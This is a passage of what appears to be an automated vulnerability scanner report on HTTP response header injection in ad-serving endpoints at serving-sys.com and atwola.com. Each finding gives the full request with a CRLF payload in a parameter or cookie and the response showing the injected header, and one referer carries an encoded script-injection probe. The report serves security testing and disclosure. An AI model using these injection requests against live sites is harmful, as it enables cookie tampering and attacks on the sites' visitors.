B3=89PS000000000St87lgH0000000001sG8qiu0000000002t68bvZ0000000001t689PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav0000000007t98j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG8qaw0000000001t7852z0000000001sS8qay0000000001t7852A0000000001sS8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=041419
e7ec5e7748f
; expires=Thu, 12-May-2011 13: 16:39 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gSdsafy50aSU00003gPVtafzY0bnA00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gNfHaaiN0aVX00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001cRreabeg03Dk00001gK8raeXe0aA900001heXhagzY0c9M00004heXiafvG0c9M00003gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gCTVa9bU0c9M00001gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; expires=Thu, 12-May-2011 13:16:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8bvZ0000000001t68qiu0000000002t67lgH0000000001sG89PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000001t77gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t78n7e0000000002tb; expires=Thu, 12-May-2011 13:16:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 12-May-2011 13:16:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 11 Feb 2011 18:16:39 GMT
Connection: close
Content-Length: 2219

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

1.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload cbbd7%0d%0af938777aeaa was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4357411~~0~~~^ebAboveTheFold~0~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.2911431968677789&flv=cbbd7%0d%0af938777aeaa&wmpv=0&res=128&bwVal=1948&bwTime=1297607871095 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 09:43:05 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.404919&debuglevel=&FLV=cbbd7
f938777aeaa
&RES=128&WMPV=0; expires=Sat, 14-May-2011 09: 43:05 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 13 Feb 2011 14:43:05 GMT
Connection: close
Content-Length: 0


1.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload f5af6%0d%0aac97bd0a503 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4357411~~0~~~^ebAboveTheFold~0~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.2911431968677789&flv=10.2154&wmpv=0&res=f5af6%0d%0aac97bd0a503&bwVal=1948&bwTime=1297607871095 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 09:43:05 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.404919&debuglevel=&FLV=10.2154&RES=f5af6
ac97bd0a503
&WMPV=0; expires=Sat, 14-May-2011 09: 43:05 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 13 Feb 2011 14:43:05 GMT
Connection: close
Content-Length: 0


1.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload fbc21%0d%0a0ecd66392fc was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4357411~~0~~~^ebAboveTheFold~0~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.2911431968677789&flv=10.2154&wmpv=fbc21%0d%0a0ecd66392fc&res=128&bwVal=1948&bwTime=1297607871095 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 09:43:05 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.404919&debuglevel=&FLV=10.2154&RES=128&WMPV=fbc21
0ecd66392fc
; expires=Sat, 14-May-2011 09: 43:05 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 13 Feb 2011 14:43:05 GMT
Connection: close
Content-Length: 0


1.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload d0d61%0d%0a2c97e4afc64 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=APE&si=18199&pi=M&xs=3&pu=http%253A//tags.bluekai.com/site/50%253Fret%253Dhtml%2526limit%253D4%2526btp%253D1%2526phint%253Dkw%25253D%2526phint%253Deid%25253D283%2526phint%253Da%25253D-1%2526phint%253Dg%25253D0%2526uhint%253Dzip%25253D0%2526phint%253Dtcat%25253D152869%2526phint%253Dkh%25253DDBDCB53F2576976D806D6498794024FC353f6%25252527%2525253balert%252525281%25252529%2525252f%2525252fc16c49bef95%2526phint%253Dbread%25253D%255BJewelry%252520%2526%252520Watches%252C%252520Engagement%252520%2526%252520Wedding%252C%252520Engagement%252520Rings%252C%252520Diamond%252C%252520Diamond%252520Solitaire%252520with%252520Accents%255D%2526phint%253Dbin%25253D1499.99%2526phint%253Dasp%25253DMain%252520Stone%252520Shape%252CHeart%252CMain%252520Stone%252520Treatment%252CNot%252520Enhanced%252CCarat%252520Total%252520Weight%252C0.90%252520-%2525201.39%252CExact%252520Carat%252520Total%252520Weight%252C.90%252CMain%252520Stone%252520Certification/Grading%252CEGL%252520USA%252CMetal%252C14k%252520White%252520Gold%252CMetal%252520Purity%252C14k%252CRing%252520Size%252C6%252CMain%252520Stone%252CDiamond%252CStyle%252CEngagement%252CJewelry%252520Type%252CRing%252CSize%252C6%252CGender%252CWomen%2527s%2526ifu%253Dhttp%25253A//burp/show/16%2526cmmiss%253D-1%2526cmkw%253D&r=tags.bluekai.com&v=5.5&cb=25243 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC353f6%2527%253balert%25281%2529%252f%252fc16c49bef95&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; Anxd=x; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5d0d61%0d%0a2c97e4afc64; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Feb 2011 14:22:42 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 13 Feb 2011 14:37:42 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298211762; path=/; expires=Sun, 20-Feb-11 14:22:42 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297606962^1297608762|18199^1297606962^1297608762; path=/; expires=Sun, 13-Feb-11 14:52:42 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; expires=Wed, 08-Feb-12 14:22:42 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 13-Feb-11 20:22:42 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5d0d61
2c97e4afc64
,3e9134c20f00f3af730f8d42d1020fd5; expires=Wed, 08-Feb-12 14:22:42 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=; expires=Wed, 08-Feb-12 14:22:42 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

1.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 84bf8%0d%0a588720eedd1 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=APE&si=84bf8%0d%0a588720eedd1&pi=M&xs=3&pu=http%253A//tags.bluekai.com/site/50%253Fret%253Dhtml%2526limit%253D4%2526btp%253D1%2526phint%253Dkw%25253D%2526phint%253Deid%25253D283%2526phint%253Da%25253D-1%2526phint%253Dg%25253D0%2526uhint%253Dzip%25253D0%2526phint%253Dtcat%25253D152869%2526phint%253Dkh%25253DDBDCB53F2576976D806D6498794024FC353f6%25252527%2525253balert%252525281%25252529%2525252f%2525252fc16c49bef95%2526phint%253Dbread%25253D%255BJewelry%252520%2526%252520Watches%252C%252520Engagement%252520%2526%252520Wedding%252C%252520Engagement%252520Rings%252C%252520Diamond%252C%252520Diamond%252520Solitaire%252520with%252520Accents%255D%2526phint%253Dbin%25253D1499.99%2526phint%253Dasp%25253DMain%252520Stone%252520Shape%252CHeart%252CMain%252520Stone%252520Treatment%252CNot%252520Enhanced%252CCarat%252520Total%252520Weight%252C0.90%252520-%2525201.39%252CExact%252520Carat%252520Total%252520Weight%252C.90%252CMain%252520Stone%252520Certification/Grading%252CEGL%252520USA%252CMetal%252C14k%252520White%252520Gold%252CMetal%252520Purity%252C14k%252CRing%252520Size%252C6%252CMain%252520Stone%252CDiamond%252CStyle%252CEngagement%252CJewelry%252520Type%252CRing%252CSize%252C6%252CGender%252CWomen%2527s%2526ifu%253Dhttp%25253A//burp/show/16%2526cmmiss%253D-1%2526cmkw%253D&r=tags.bluekai.com&v=5.5&cb=25243 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC353f6%2527%253balert%25281%2529%252f%252fc16c49bef95&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; Anxd=x; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Feb 2011 14:20:10 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 13 Feb 2011 14:35:10 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298211610; path=/; expires=Sun, 20-Feb-11 14:20:10 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297606810^1297608610|84bf8
588720eedd1
^1297606810^1297608610; path=/; expires=Sun, 13-Feb-11 14:50:10 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; expires=Wed, 08-Feb-12 14:20:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 13-Feb-11 20:20:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5; expires=Wed, 08-Feb-12 14:20:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=; expires=Wed, 08-Feb-12 14:20:10 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

